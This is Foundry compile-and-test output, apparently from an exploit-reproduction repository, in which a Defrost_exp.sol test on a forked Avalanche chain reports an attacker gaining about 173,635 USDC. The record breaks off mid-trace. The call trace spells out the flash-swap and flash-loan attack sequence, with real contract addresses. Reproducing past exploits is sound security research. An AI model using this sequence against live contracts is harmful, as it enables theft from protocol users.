Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.25s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2022-12/Defrost_exp.sol:23:5:
   |
23 |     IERC20 USDC = IERC20(0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:3064:1:
     |
3064 | interface USDC {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/Defrost_exp.sol:44:22:
   |
44 |     function joeCall(address _sender, uint256 _amount0, uint256 _amount1, bytes calldata _data) external {
   |                      ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/Defrost_exp.sol:44:39:
   |
44 |     function joeCall(address _sender, uint256 _amount0, uint256 _amount1, bytes calldata _data) external {
   |                                       ^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/Defrost_exp.sol:44:57:
   |
44 |     function joeCall(address _sender, uint256 _amount0, uint256 _amount1, bytes calldata _data) external {
   |                                                         ^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/Defrost_exp.sol:44:75:
   |
44 |     function joeCall(address _sender, uint256 _amount0, uint256 _amount1, bytes calldata _data) external {
   |                                                                           ^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/Defrost_exp.sol:51:9:
   |
51 |         address initiator,
   |         ^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/Defrost_exp.sol:52:9:
   |
52 |         address token,
   |         ^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/Defrost_exp.sol:53:9:
   |
53 |         uint256 amount,
   |         ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/Defrost_exp.sol:54:9:
   |
54 |         uint256 fee,
   |         ^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/Defrost_exp.sol:55:9:
   |
55 |         bytes calldata data
   |         ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 470.01ms (1.90ms CPU time)

Ran 1 test for src/test/2022-12/Defrost_exp.sol:ContractTest
[PASS] testExploit() (gas: 637224)
Logs:
  [End] Attacker USDC balance after exploit: 173635.816661

Traces:
  [5779] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("Avalanche", 24003940 [2.4e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [770624] ContractTest::testExploit()
    ├─ [32861] 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96::maxFlashLoan(0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E) [staticcall]
    │   ├─ [23027] 0x625E7708f30cA75bfd92586e17077590C60eb4cD::balanceOf(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96) [staticcall]
    │   │   ├─ [17975] 0xa5ba6E5EC19a1Bf23C857991c857dB62b2Aa187B::balanceOf(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96) [delegatecall]
    │   │   │   ├─ [10278] 0x794a61358D6845594F94dc1DB02A252b5b4814aD::getReserveNormalizedIncome(0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E) [staticcall]
    │   │   │   │   ├─ [5226] 0xDF9e4ABdbd94107932265319479643D3B05809dc::getReserveNormalizedIncome(0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000346e981e0ac3276197b7494
    │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000346e981e0ac3276197b7494
    │   │   │   └─ ← [Return] 194263946041 [1.942e11]
    │   │   └─ ← [Return] 194263946041 [1.942e11]
    │   └─ ← [Return] 194263946041 [1.942e11]
    ├─ [2825] 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96::flashFee(0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E, 194263946041 [1.942e11]) [staticcall]
    │   └─ ← [Return] 19426394 [1.942e7]
    ├─ [670354] 0xf4003F4efBE8691B60249E6afbD307aBE7758adb::swap(0, 194283372435 [1.942e11], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00)
    │   ├─ [43928] 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 194283372435 [1.942e11])
    │   │   ├─ [36728] 0xa3fa3D254bf6aF295b5B22cC6730b04144314890::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 194283372435 [1.942e11]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: 0xf4003F4efBE8691B60249E6afbD307aBE7758adb, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 194283372435 [1.942e11])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0x0000000000000000000000000000000000000000000000000000002d3c30ff93
    │   │   │   │   @ 0x765b609ffdf136afe6a091ab2ab68a125caa0ddb309ecce362de4a07428aea9f: 0x000000000000000000000000000000000000000000000000000002b4df6716e4 → 0x00000000000000000000000000000000000000000000000000000287a3361751
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ [583430] ContractTest::joeCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 194283372435 [1.942e11], 0x00)
    │   │   ├─ [466911] 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96::flashLoan(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E, 194263946041 [1.942e11], 0x00)
    │   │   │   ├─ [182939] 0x794a61358D6845594F94dc1DB02A252b5b4814aD::withdraw(0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E, 194263946041 [1.942e11], 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96)
    │   │   │   │   ├─ [182378] 0xDF9e4ABdbd94107932265319479643D3B05809dc::withdraw(0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E, 194263946041 [1.942e11], 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96) [delegatecall]
    │   │   │   │   │   ├─ [2402] 0xa97684ead0e402dC232d5A977953DF7ECBaB3CDb::getPriceOracle() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0xEBd36016B3eD09D4693Ed4251c67Bd858c3c7C9C
    │   │   │   │   │   ├─ [168757] 0xC603A9E957482298738EA65aA24e61b38859B48D::186dea44(0000000000000000000000000000000000000000000000000000000000000034000000000000000000000000000000000000000000000000000000000000003600000000000000000000000000000000000000000000000000000000000000373e93b99deab8fa8b6a363830758cb0270dc6ca5cd557b019a86bf7b25a3dd4e7000000000000000000000000b97ef9ef8734c71904d8002f8b6bc66dd9c48a6e0000000000000000000000000000000000000000000000000000002d3b089339000000000000000000000000ff152e21c5a511c478ed23d1b89bb9391be6de96000000000000000000000000000000000000000000000000000000000000000c000000000000000000000000ebd36016b3ed09d4693ed4251c67bd858c3c7c9c0000000000000000000000000000000000000000000000000000000000000000) [delegatecall]
    │   │   │   │   │   │   ├─ [7468] 0xFCCf3cAbbe80101232d343252614b6A3eE81C989::scaledTotalSupply() [staticcall]
    │   │   │   │   │   │   │   ├─ [2419] 0x81387c40EB75acB02757C1Ae55D5936E78c9dEd3::scaledTotalSupply() [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000041da786a480b
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000041da786a480b
    │   │   │   │   │   │   ├─ [11676] 0x307ffe186F84a3bc2613D1eA417A5737D69A7007::getSupplyData() [staticcall]
    │   │   │   │   │   │   │   ├─ [6615] 0x52A1CeB68Ee6b7B5D13E0376A1E0E4423A8cE26e::getSupplyData() [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000100653c0a7000000000000000000000000000000000000000000000000000000100b095c580000000000000000000000000000000000000000002bbe2e26496e04a670b9dc00000000000000000000000000000000000000000000000000000000639b2002
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000100653c0a7000000000000000000000000000000000000000000000000000000100b095c580000000000000000000000000000000000000000002bbe2e26496e04a670b9dc00000000000000000000000000000000000000000000000000000000639b2002
    │   │   │   │   │   │   ├─ [1146] 0x625E7708f30cA75bfd92586e17077590C60eb4cD::scaledBalanceOf(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96) [staticcall]
    │   │   │   │   │   │   │   ├─ [626] 0xa5ba6E5EC19a1Bf23C857991c857dB62b2Aa187B::scaledBalanceOf(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000002c991c1e0a
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000002c991c1e0a
    │   │   │   │   │   │   ├─ [7499] 0xf4a0039F2d4a2EaD5216AbB6Ae4C4C3AA2dB9b82::calculateInterestRates((0, 0, 194263946041 [1.942e11], 68904639576 [6.89e10], 74078819311737 [7.407e13], 52881911184258890734811612 [5.288e25], 1000, 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E, 0x625E7708f30cA75bfd92586e17077590C60eb4cD)) [staticcall]
    │   │   │   │   │   │   │   ├─ [3226] 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E::balanceOf(0x625E7708f30cA75bfd92586e17077590C60eb4cD) [staticcall]
    │   │   │   │   │   │   │   │   ├─ [2529] 0xa3fa3D254bf6aF295b5B22cC6730b04144314890::balanceOf(0x625E7708f30cA75bfd92586e17077590C60eb4cD) [delegatecall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 113483779637734 [1.134e14]
    │   │   │   │   │   │   │   │   └─ ← [Return] 113483779637734 [1.134e14]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000052ffc9dad08e9aaedad5b0000000000000000000000000000000000000000002b2d4b45143b7170bf606e0000000000000000000000000000000000000000000e8b0eb581a83ff5fb036d
    │   │   │   │   │   │   ├─ emit ReserveDataUpdated(param0: 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E, param1: 6271240264021828619316571 [6.271e24], param2: 52197705218632563323527278 [5.219e25], param3: 17581641749060506588218221 [1.758e25], param4: 1014182544046923627575866516 [1.014e27], param5: 1023095144527329322798772856 [1.023e27])
    │   │   │   │   │   │   ├─ [81922] 0x625E7708f30cA75bfd92586e17077590C60eb4cD::burn(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 194263946041 [1.942e11], 1014182544046923627575866516 [1.014e27])
    │   │   │   │   │   │   │   ├─ [81358] 0xa5ba6E5EC19a1Bf23C857991c857dB62b2Aa187B::burn(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 194263946041 [1.942e11], 1014182544046923627575866516 [1.014e27]) [delegatecall]
    │   │   │   │   │   │   │   │   ├─ [27770] 0x929EC64c34a17401F460460D4B9390518E5B473e::handleAction(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 185007454390983 [1.85e14], 191547317770 [1.915e11])
    │   │   │   │   │   │   │   │   │   ├─ [20616] 0xaad324f7e4Dd50C6b105820f8a877eE2DCBFA789::handleAction(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 185007454390983 [1.85e14], 191547317770 [1.915e11]) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   ├─ emit Accrued(param0: 0x625E7708f30cA75bfd92586e17077590C60eb4cD, param1: 0xB31f66AA3C1e785363F0875A1B74E27b85FD66c7, param2: 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, param3: 360880007081595 [3.608e14], param4: 360880007081595 [3.608e14], param5: 249581836566397626 [2.495e17])
    │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   @ 0xf27c694d3de7aae525f405a99ebb72962980f6ce42aec8c10c455950fc88630a: 0x6428e1a063a58dfd00000000157c2089ce0c97000000000000014832ac4732c9 → 0x6428e1a063a590af00000000157c2089ce0c97000000000000014837eca0ee7b
    │   │   │   │   │   │   │   │   │   │   │   @ 0xc4c85326407185de872fdddc4f1df8d758cf525143060801cf187b58d31267da: 0x000000000000000000000000000000000000000000000000000147088d1ecbfb → 0x00000000000000000000000376b15ba6ee02ba000000000000014837eca0ee7b
    │   │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   │   └─ ← [Return]
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, to: 0x0000000000000000000000000000000000000000, value: 194262400484 [1.942e11])
    │   │   │   │   │   │   │   │   ├─ emit Burn(param0: 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, param1: 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, param2: 194262400484 [1.942e11], param3: 1545557 [1.545e6], param4: 1014182544046923627575866516 [1.014e27])
    │   │   │   │   │   │   │   │   ├─ [33428] 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E::transfer(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 194263946041 [1.942e11])
    │   │   │   │   │   │   │   │   │   ├─ [32728] 0xa3fa3D254bf6aF295b5B22cC6730b04144314890::transfer(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 194263946041 [1.942e11]) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x625E7708f30cA75bfd92586e17077590C60eb4cD, to: 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, value: 194263946041 [1.942e11])
    │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   @ 0x48ab1c212394022d45677e5dab2bd184d75034a1eeb669ebe093cc603fe260e3: 0 → 0x0000000000000000000000000000000000000000000000000000002d3b089339
    │   │   │   │   │   │   │   │   │   │   │   @ 0x37822bc9d1e42633e7a10b46af9482f8c36329728a2f80f4a9a3fca27d86e879: 0x00000000000000000000000000000000000000000000000000006736805f81e6 → 0x000000000000000000000000000000000000000000000000000067094556eead
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0xc2e4d1d4d5cc5ac5f3c9d78db895f91f8e825342406c676d70f0cd57d2b69f5f: 0x000000000346e7cc778f226e2f2560ab00000000000000000000002c991c1e0a → 0x000000000346e981e0ac3276197b749400000000000000000000000000000000
    │   │   │   │   │   │   │   │   │   @ 54: 0x0000000000000000000000000000000000000000000000000000a84367998ac7 → 0x0000000000000000000000000000000000000000000000000000a816ce7d6cbd
    │   │   │   │   │   │   │   │   │   @ 0xc4c85326407185de872fdddc4f1df8d758cf525143060801cf187b58d31267da: 0x00000000000000000000000000000000000000000000000000014837eca0ee7b → 0x00000000000000000000000376b15ba6ee02ba000000000000014837eca0ee7b
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   └─ ← [Return]
    │   │   │   │   │   │   ├─ emit ReserveUsedAsCollateralDisabled(param0: 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E, param1: 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96)
    │   │   │   │   │   │   ├─ emit Withdraw(param0: 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E, param1: 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, param2: 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, param3: 194263946041 [1.942e11])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x3e93b99deab8fa8b6a363830758cb0270dc6ca5cd557b019a86bf7b25a3dd4e7: 32 → 0
    │   │   │   │   │   │   │   @ 0x2889eaa22747c352a3ff649cf4e08b28f365682fd55aaed4ce267db314fb2e55: 0x00000000000e8733bfc10ef1d1c0759300000000034e48c2e2f6dbf099e94fe0 → 0x00000000000e8b0eb581a83ff5fb036d00000000034e48d2eaf49e4bc9b17278
    │   │   │   │   │   │   │   @ 0x2889eaa22747c352a3ff649cf4e08b28f365682fd55aaed4ce267db314fb2e54: 0x0000000000052d3de0f5a3728a02e33e000000000346e97c370f72ba7773baf3 → 0x0000000000052ffc9dad08e9aaedad5b000000000346e981e0ac3276197b7494
    │   │   │   │   │   │   │   @ 0x2889eaa22747c352a3ff649cf4e08b28f365682fd55aaed4ce267db314fb2e5b: 0x000000000000000000000000000000000000000000000000000000000a9021cd → 0x000000000000000000000000000000000000000000000000000000000ab07021
    │   │   │   │   │   │   │   @ 0x48ab1c212394022d45677e5dab2bd184d75034a1eeb669ebe093cc603fe260e3: 0 → 0x0000000000000000000000000000000000000000000000000000002d3b089339
    │   │   │   │   │   │   │   @ 0x2889eaa22747c352a3ff649cf4e08b28f365682fd55aaed4ce267db314fb2e56: 0x00000000000000000000020063a58ea800000000002b2ccfe65c2847ac380eb2 → 0x00000000000000000000020063a590af00000000002b2d4b45143b7170bf606e
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000002d3b089339
    │   │   │   │   │   └─ ← [Return] 194263946041 [1.942e11]
    │   │   │   │   └─ ← [Return] 194263946041 [1.942e11]
    │   │   │   ├─ [4728] 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 194263946041 [1.942e11])
    │   │   │   │   ├─ [4028] 0xa3fa3D254bf6aF295b5B22cC6730b04144314890::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 194263946041 [1.942e11]) [delegatecall]
    │   │   │   │   │   ├─ emit Transfer(from: 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 194263946041 [1.942e11])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x48ab1c212394022d45677e5dab2bd184d75034a1eeb669ebe093cc603fe260e3: 0x0000000000000000000000000000000000000000000000000000002d3b089339 → 0
    │   │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x0000000000000000000000000000000000000000000000000000002d3c30ff93 → 0x0000000000000000000000000000000000000000000000000000005a773992cc
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [186384] ContractTest::onFlashLoan(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E, 194263946041 [1.942e11], 19426394 [1.942e7], 0x00)
    │   │   │   │   ├─ [25746] 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E::approve(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─ [25078] 0xa3fa3D254bf6aF295b5B22cC6730b04144314890::approve(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]) [delegatecall]
    │   │   │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xa6e2623793b94b1f0414b6b91c6c42fd18905fbe0a934b0e9b8e134f4c440179: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [134878] 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96::deposit(194263946041 [1.942e11], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   ├─ [3089] 0x625E7708f30cA75bfd92586e17077590C60eb4cD::balanceOf(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96) [staticcall]
    │   │   │   │   │   │   ├─ [2537] 0xa5ba6E5EC19a1Bf23C857991c857dB62b2Aa187B::balanceOf(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96) [delegatecall]
    │   │   │   │   │   │   │   ├─ [1340] 0x794a61358D6845594F94dc1DB02A252b5b4814aD::getReserveNormalizedIncome(0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E) [staticcall]
    │   │   │   │   │   │   │   │   ├─ [788] 0xDF9e4ABdbd94107932265319479643D3B05809dc::getReserveNormalizedIncome(0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E) [delegatecall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000346e981e0ac3276197b7494
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000346e981e0ac3276197b7494
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ [25771] 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 194263946041 [1.942e11])
    │   │   │   │   │   │   ├─ [25097] 0xa3fa3D254bf6aF295b5B22cC6730b04144314890::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 194263946041 [1.942e11]) [delegatecall]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, value: 194263946041 [1.942e11])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0xa6e2623793b94b1f0414b6b91c6c42fd18905fbe0a934b0e9b8e134f4c440179: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffd2c4f76cc6
    │   │   │   │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x0000000000000000000000000000000000000000000000000000005a773992cc → 0x0000000000000000000000000000000000000000000000000000002d3c30ff93
    │   │   │   │   │   │   │   │   @ 0x48ab1c212394022d45677e5dab2bd184d75034a1eeb669ebe093cc603fe260e3: 0 → 0x0000000000000000000000000000000000000000000000000000002d3b089339
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [1226] 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E::balanceOf(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96) [staticcall]
    │   │   │   │   │   │   ├─ [529] 0xa3fa3D254bf6aF295b5B22cC6730b04144314890::balanceOf(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 194263946041 [1.942e11]
    │   │   │   │   │   │   └─ ← [Return] 194263946041 [1.942e11]
    │   │   │   │   │   ├─ [56756] 0x794a61358D6845594F94dc1DB02A252b5b4814aD::supply(0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E, 194263946041 [1.942e11], 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 0)
    │   │   │   │   │   │   ├─ [56192] 0xDF9e4ABdbd94107932265319479643D3B05809dc::supply(0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E, 194263946041 [1.942e11], 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 0) [delegatecall]
    │   │   │   │   │   │   │   ├─ [54944] 0xC603A9E957482298738EA65aA24e61b38859B48D::1913f161(000000000000000000000000000000000000000000000000000000000000003400000000000000000000000000000000000000000000000000000000000000363e93b99deab8fa8b6a363830758cb0270dc6ca5cd557b019a86bf7b25a3dd4e7000000000000000000000000b97ef9ef8734c71904d8002f8b6bc66dd9c48a6e0000000000000000000000000000000000000000000000000000002d3b089339000000000000000000000000ff152e21c5a511c478ed23d1b89bb9391be6de960000000000000000000000000000000000000000000000000000000000000000) [delegatecall]
    │   │   │   │   │   │   │   │   ├─ [968] 0xFCCf3cAbbe80101232d343252614b6A3eE81C989::scaledTotalSupply() [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [419] 0x81387c40EB75acB02757C1Ae55D5936E78c9dEd3::scaledTotalSupply() [delegatecall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000041da786a480b
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000041da786a480b
    │   │   │   │   │   │   │   │   ├─ [3176] 0x307ffe186F84a3bc2613D1eA417A5737D69A7007::getSupplyData() [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [2615] 0x52A1CeB68Ee6b7B5D13E0376A1E0E4423A8cE26e::getSupplyData() [delegatecall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000100653c0a7000000000000000000000000000000000000000000000000000000100b095c580000000000000000000000000000000000000000002bbe2e26496e04a670b9dc00000000000000000000000000000000000000000000000000000000639b2002
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000100653c0a7000000000000000000000000000000000000000000000000000000100b095c580000000000000000000000000000000000000000002bbe2e26496e04a670b9dc00000000000000000000000000000000000000000000000000000000639b2002
